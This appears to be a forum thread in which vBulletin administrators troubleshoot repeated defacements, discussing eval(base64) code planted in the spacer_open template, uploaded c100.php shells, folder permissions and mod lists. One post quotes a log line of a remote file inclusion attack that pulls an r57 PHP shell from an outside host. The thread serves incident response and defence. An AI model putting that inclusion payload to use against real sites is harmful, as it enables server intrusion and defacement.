vbulletin hacked
 

I was recently called in to recover a friends vbulletin after it was hacked by ViRuS_HiMa,
a well known and fairly experienced hacker at turk-h.org
Since cpanel logging was not enabled, I do not know how he has entered the site but his technique was rewriting the spacer_open template in all styles with an eval(base64)
I would like very much to decode the eval(base64) so I can see if its simple html or if there is additional executions being made that I need to be aware of.
If anyone can assist with the decoding, please contact me.
Again, I do not know the point of entry (probably a Mod).

If anyone else has their forum hacked by ViRuS_HiMa, and it seems that no matter what you try,
it always shows the defacement, check your spacer_open templates in the database for eval(base64) encrypted text.

Thanks

What is the URL to your friends board?

I sent it via pm since the site exploit has not yet been found.

I don't see anything obvious at this time on the site.

This could have been done in many different ways: vulnerable modification, access to the database, etc..

It happened again, the sites uses all non-beta mods, only two people have access to the database, and no mods that are known to be vulnerable. I believe it was the mysmiles mod, but I have no proof.

Make a database backup, clean everything off your server.

Reset everything up, run your database thru the impex to ensure no extra tables or permissions or anything have been added. and reupload vBulletin.

That will ensure no files have been left behind from the hacker

Last time, Bilderback removed it and we didn't have logs. This time we do. So I can see what it was. He changed the database and inserted something.

I'm still going through logs but all I can find right now is as follows:

The spacer_open always end with a </textarea> just after his eval code
I also found a vbulletin_textedit.js file within the Photoplog images directory.
Still looking into that one.

can you list hack you have install please.

Auto Move Closed Threads 1.1.1
Automatically Added Friend 1.0.1
Casino .92
Cyb - Advanced Forum Statistics 5.8.1
Cyb - PayPal Donate 4.7
Friends "Facebook style" 1.0.0
Gifts System 0.6
GTPrivate Message Quickreply 3.7.0.1
GTUserCP - Enhanced USERCP Interface + USERCP Menu 3.7
gXboxLive 2.1.9
HS - Signature of the Week 1.0.0
ibProArcade for vBulletin 2.6.7
Inactive User Reminder Emails 1.1.3
Members who have Visited 3.7.003
Miserable Users 3.7.002 .
Mobile Device Detection 1.0.0
Multiple Login Detector 1.03
MySmilies VB 3.7.004
passiveVid 1.1.2
PhotoPlog Pro 2.1.4.8
Report Bad PM 1.0.5
Separate Sticky and Normal Threads 2.0.0
SocialForums 1.4.2
TCattd - The Image Resizer 1.2.6
Usergroup Color Bar 1.0.0
vBadvanced Links Directory 3.0 RC1
vBCredits 1.4
vBCredits with ibProArcade 1.2
vBSEO 3.2.0
vBSEO :: Sitemap Generator 2.2
Welcome Headers 5.0.2

one of my forums was hacked not long ago and this hacks we both have.
dont know if this help us .

ibProArcade for vBulletin 2.6.7
Inactive User Reminder Emails 1.1.3
Miserable Users 3.7.002 .
vBSEO 3.2.0
vBSEO :: Sitemap Generator 2.2

Please check if you have set chmd to 777 or any of ur directory in the public_html.if you have then its easily can be hack like defacement by uploading somefile in php.after chaning the chmd check there must be some file with strange name delete it .

--------------- Added [DATE]1218913961[/DATE] at [TIME]1218913961[/TIME] ---------------

ibProArcade for vBulletin 2.6.7 required chmd 777 on arcade soo its risky i guess

I did find the mysmiliesvb folder with 0777 permissions. The readme in the mod says it is required.
The user albums were moved into the file system and although the main folder is 0755,
every sub folder vbulletin creates is set to 0777
I found a 1x1 pixel image in the avatars folder but I cannot seem to locate it within file manager.

side note dude, my website & db was hacked a while back, maybe like year & 1/2 ago, I got in touch with my hosting company who checked the logs, and it ended up being FlashChat w/ vB intergration that they used to get in.... So if you are using systems outside vB that are intergrated into... Be advised of those as well, FlashChat is what got my site hacked.

All directories must be CHMOD 755 or higher security (meaning lower than 755, ex 750, 644, etc)

You cannot set CHMOD 777 on any files or directories because this makes the files world WRITABLE which is insecure

soo if any mod requires to set 0777 i recommend not to use it .have u lost any database of your site ?

Happened again, this time different person.

Have you followed all the steps outlined in this article?
How To Make My Forums More Secure

PAKIDIL, I recommend you read this before you continue to tell people not to install modifications with 777'd folders: Why chmod 777 is NOT a security risk

Such a pain. Thankfully they only changed the index. I changed passwords and such. As for the list provided, I did most.

Thanks for all your suggestions- we're still looking for the exploit.
The latest hacker placed text within the inlinemodform just above the threadlist table.
http://thebestforumever.com/front-desk/
Has also been doing index page defacing.
I suppose we'll simply have to back track and begin disabling plugins until it can be located.

maybe problem was this http://www.vbulletin.com/forum/showthread.php?t=282133

You wouldn't happen to have HTML enabled anywhere?

I got hacked an hour after I installed it. :erm:

Of course not. I know that is a no no.:o

I did find this in log.. anyone?
GET /index.php?vb=include('http://meto5757.by.ru/shells/r57.txt');

Upon further research, they tried multiple file exploits finally ending in the faq.php
which got a c100.php file uploaded to root

I didnt post the shell I found but I sent it to Marco via PM

i am just sharing my experience and telling people could be this may be the issue .my forum hacked and i know how they hacked thtz why i am sharing .now i am still runing forum widout allowing attachment ,no folder is on chmd 777 and plus the post u quote is not mine i just copy paste from big company hostgator. they are best in forum running web hosting.they have lots of vbulletin forum running on their server and always solve this kind of issue's to their client and the link you posted is from simplemachines and we are using vbulletin soo may be its not problem with them.

My Forum got hacked as well.. by virusman... my forum url: http://www.hyipsensor.net/board

Please check whether it is the same problem as stated in this thread..

Yes, same problem
It appears that there is a backdoor on the bluehost server.
I have seen many queries to search engines for that specific shared ip address.
Its either in your spacer_open templates or your index.php was rewritten.
Also look for a c100.php file in your forum root.
You can contact me if you need assistance.

EDIT: I just checked other files in your board and it appears that the template hack was executed.
Look for some weird code in your spacer_open(s)

My point is, if they've hacked into your server, your file permissions aren't going to matter. They will have access to everything anyway.

From what I remember when I use to follow some exploits that occurred on a notorious site for logging site defacements. Usually groups don't just hack the individual website but actually obtain rights over entire servers (This was because there was a score system for how many defacements the groups obtained). They would exploit code that Host provider have installed on their systems and doesn't effect just one website but potentially their whole clientèle base.

If you can't find fault in your software or mods (If it's server side then they would rewrite the indexes as a BATCH), I would seriously suggest informing your Host or enquiring at the very least if they are having problems.

Seeing a trend here, I got hit last night and mine was a bit different as they seemed to get FTP access and they ran a script that started adding porn links in all the files on the server. I have full off-server backups but it still took about 4-5 hours to delete everything off there and go to a backup.

My issue may be unrelated or it may be related...

I do know it was a bot that hit my site as they changed hundreds of files in about 20-minutes. I have copies of the code they inserted as well (darned porn links).

YEAH YOU are rite if they hack in to the server then this permission are not going to matter.ofcourse they will hack it again .it will be like a theif has entered in the house and after that you are locking the door. must search for the good hosting company.

It took some time but I figured out my hacker came from IP: 84.121.141.217

IP owner info (Whois)
Related IPs:
I locked out the hacker's IP and all related IPs. Perhaps this will help someone else

Thanks. 84.0.0.0-84.255.255.255 added to my cpanel ip deny manager. I don't expect any legit visitors from NL, so I can get away with that!

Your "hacker" has used an IP address that is asigned to a Spanish ISP. So he is just 1 of the customers of this ISP. He is not located in the Netherlands.

PS RIPE is the european registrar and it's headquarters are located in the Netherlands, this has got nothing to do with your hacker.

Thanks for the clarification. I'm not expecting anyone legit from Spain either, so I'm still safe denying the whole range.

Any updates on this vulnerability? I had a site hacked twice exactly the same way (base64 encrypted php code was inserted at table 'template' , field 'template' , key record 'spacer_open', which was evaluated and defaced the website). My vBulletin version is 3.7.3 PL1. Modules used (all latest available version):

• MorbiD SuitE [9 Flavours] | LYCHEE new| 3.7.2
• Cyb - Advanced Permissions Based on Post Count
• Automatic Thread Tagger
• Periodic Prune Pms [ Cron Job - Fully Controlable ]
• Separate Sticky and Normal Threads
• Embed XHTML valid YouTube and Google Video into your posts
• Automatic Inactive Users Pruning - vB3.7 RC2
• vbAnonymizer
• GTCustom Pages - Create Custom Pages With Ease
• Send emails with HTML as HTML

It seems that the only module installed alike with bilderback's configuration is "Separate Sticky and Normal Threads".
I still haven't found how attackers managed to rewrite the spacer_open template in all styles with an eval(base64) function...
Anyone with the same problem?

In our case, there was a php shell script already planted somewhere on the BlueHost shared server.
Amazingly and rare, the hacker actually communicated in the forum for some time.
http://thebestforumever.com/archives...c-ur-site.html

I'd be interested in seeing what he said, but without registering. Care to post his comments?

I have some quotes if you want them: